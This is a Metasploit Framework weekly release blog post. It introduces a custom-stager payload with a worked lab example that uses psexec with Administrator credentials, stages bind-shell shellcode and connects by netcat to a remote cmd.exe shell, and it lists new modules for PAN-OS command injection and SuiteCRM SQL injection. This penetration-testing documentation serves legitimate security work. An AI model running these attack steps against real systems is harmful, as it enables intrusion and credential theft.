Last updated at Fri, 16 Sep 2022 20:09:50 GMT

BYOS: Bring your own stager

We try hard to make sure we have a great choice of fully-functional payloads to choose from, but sometimes you might want to “branch” out on your own, and if that’s the case we’ve got you covered. In an attempt to make Metasploit play well with others, we’ve introduced a brand new payload type: “custom.” “Custom” payloads use Metasploit stagers to build a stager that will stage whatever shellcode you send it.

Got a third-party payload you want to run like Sliver or a payload that’s too big or has too many bad characters to use in an exploit? All you need to do is queue up your exploit of choice in Framework, select the custom payload type, set the shellcode_file option, and when you launch the exploit, Metasploit will use our stagers to upload and run your custom shellcode on the target.

While we have developed a handler that will send your custom code in, there’s no requirement to use it. You are welcome to write your own handlers: the communication protocol is simply to prepend the shellcode size to the shellcode and send it; the custom payload stager will allocate memory and jump into the shellcode it places in memory.

Here’s an example using traditional “bind shellcode” to get a cmd.exe session on a Windows target:

msf6 exploit(windows/smb/psexec) > show options

Module options (exploit/windows/smb/psexec):

   Name                  Current Setting  Required  Description
   ----                  ---------------  --------  -----------
   RHOSTS                10.5.132.159     yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Usi
                                                    ng-Metasploit
   RPORT                 445              yes       The SMB service port (TCP)
   SERVICE_DESCRIPTION                    no        Service description to to be used on target for pretty listing
   SERVICE_DISPLAY_NAME                   no        The service display name
   SERVICE_NAME                           no        The service name
   SMBDomain             .                no        The Windows domain to use for authentication
   SMBPass               v3Mpassword      no        The password for the specified username
   SMBSHARE                               no        The share to connect to, can be an admin share (ADMIN$,C$,...) or a normal read
                                                    /write folder share
   SMBUser               Administrator    no        The username to authenticate as


Payload options (windows/x64/custom/reverse_tcp):

   Name            Current Setting          Required  Description
   ----            ---------------          --------  -----------
   EXITFUNC        thread                   yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST           10.5.135.101             yes       The listen address (an interface may be specified)
   LPORT           4567                     yes       The listen port
   SHELLCODE_FILE  x64_shell_bind_4444.bin  no        Shellcode bin to launch


Exploit target:

   Id  Name
   --  ----
   0   Automatic


msf6 exploit(windows/smb/psexec) > run

[*] Started reverse TCP handler on 10.5.135.101:4567 
[*] 10.5.132.159:445 - Connecting to the server...

<hacking intensifies>

[*] Sending stage (505 bytes) to 10.5.132.159
[+] Custom stage sent; session has been closed
[*] Custom session 1 opened (10.5.135.101:4567 -> 127.0.0.1) at 2022-09-08 15:29:02 -0500


[*] 10.5.132.159 - Custom session 1 closed.  Reason: User exit
[+] Custom stage sent; session has been closed
msf6 exploit(windows/smb/psexec) > exit

Now, we can just open a netcat session to the independent bind shell we started on the target:



[ruby-3.0.2@metasploit-framework](upstream-master) tmoose@ubuntu:~/rapid7/metasploit-framework$ nc 10.5.132.159 4444
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.

C:\Windows\system32>ipconfig
ipconfig

Windows IP Configuration


Ethernet adapter Ethernet0:

   Connection-specific DNS Suffix  . : 
   Link-local IPv6 Address . . . . . : fe80::1054:53:8f37:5615%11
   IPv4 Address. . . . . . . . . . . : 10.5.132.159
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : 10.5.132.1

Tunnel adapter isatap.{A69D5981-18E2-43CF-982C-D844D6BB7D03}:

   Media State . . . . . . . . . . . : Media disconnected
   Connection-specific DNS Suffix  . : 

C:\Windows\system32>

Module added to exploit OS Command Injection in PAN-OS

Mikhail Klyuchnikov, Nikita Abramov, UnD3sc0n0c1d0, and jheysel-r7 introduced a new module that exploits an OS Command Injection vulnerability CVE-2020-2038 in PAN-OS. This exploit affects versions of PAN-OS 9.0 up to 9.0.10, 9.1 up to 9.1.4, and 10.0 up to 10.0.1. PAN-OS runs one of the leading enterprise firewalls, Palo Alto Networks next-generation firewall (NGFW). The National Vulnerability Database ranks the severity of this exploit as a high 7.2, as administrators of the system are able to execute arbitrary commands with root privileges. This is due to the API not employing sufficient filtering of input for its "op" request. An excellent writeup on exploiting this vulnerability and other similar vulnerabilities can be found on PT Swarm.

New module content (4)

  • SuiteCRM authenticated SQL injection in export functionality by Exodus Intelligence, Redouane NIBOUCHA, and jheysel-r7 - This adds support for EIP-0f5d2d7f, a vulnerability in the uid parameter of the index.php?entryPoint=export page on SuiteCRM prior to 7.x prior to 7.12.6 that allows for authenticated SQL injection. The module exploits this SQL injection vulnerability to extract the usernames and password hashes for SuiteCRM users, which can then be cracked offline later to gain access to SuiteCRM.

  • Palo Alto Networks Authenticated Remote Code Execution by Mikhail Klyuchnikov, Nikita Abramov, UnD3sc0n0c1d0, and jheysel-r7, which exploits CVE-2020-2038 - This adds an exploit module that leverages an OS Command Injection vulnerability in the PAN-OS management interface versions 10.0 to 10.0.1, versions 9.1.0 to 9.1.4, and version 9.0.0 to 9.0.10. This vulnerability is identified as CVE-2020-2038 and allows authenticated administrators to execute arbitrary OS commands with root privileges.

  • #16521 from bwatters-r7 - This adds a 32-bit and 64-bit custom stage Windows payload. The custom stage allows users to provide their own custom executable code to be delivered as the payload stage in place of Meterpreter, Shell and other Metasploit-provided stages.

  • #16906 from bcoles - This improves the post/windows/gather/enum_snmp module with shell and Powershell sessions support as well as fixes issues that low-privileged sessions would run into while reading the registry.

Enhancements and features (5)

  • #16911 from bcoles - This adds support for non-Meterpreter sessions and for WOW64 Meterpreter sessions to the post/windows/gather/enum_ms_product_keys module.
  • #16929 from bcoles - The post/windows/gather/enum_services module has been updated to support non-Meterpreter sessions, to fix some bugs, and to clean up the code. Additionally documentation has been added on how to use the module.
  • #16930 from bcoles - This updates the scripts/resource/dev_checks.rc resource script to fix issues and add additional module checks.
  • #16953 from bcoles - The enum_domain script has been updated to support Powershell and Shell sessions and its documentation and code have been cleaned up.
  • #17008 from EmilioPanti - rpc_core.rb has been updated so that it now reports the number of evasion modules within Metasploit. Previously this statistic wasn't being reported, whilst other statistics like number of exploit modules, auxiliary modules, and payloads were.

Bugs fixed (5)

  • #16928 from bcoles - Multiple bugs have been fixed in the Msf::Post::Windows::Service mixin. Additionally, several methods have been adjusted within this mixin so that the data types they use or return are consistent.
  • #16998 from adfoster-r7 - Fixes a crash in modules using the IAX2 client.
  • #17013 from zeroSteiner - This PR enhances exploit/multi/http/jenkins_script_console to handle changes to the login process for Jenkins newer than version 2.246.
  • #17014 from adfoster-r7 - This fixes the exploit/multi/php/ignition_laravel_debug_rce module to use the default HTTP timeout for the check method. Without this, the check method would yield false negatives on slower connections.
  • #17018 from adfoster-r7 - This fixes the route add command to use a sensible default netmask.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate
and you can get more details on the changes since the last blog post from
GitHub:

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest.
To install fresh without using git, you can use the open-source-only Nightly Installers or the
binary installers (which also include the commercial edition).